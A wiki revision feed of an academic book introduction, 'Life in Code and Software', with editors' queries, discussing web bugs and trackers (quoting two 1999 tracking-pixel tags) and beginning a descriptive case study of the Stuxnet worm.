[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4696</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4696"/>
		<updated>2012-04-18T13:34:49Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
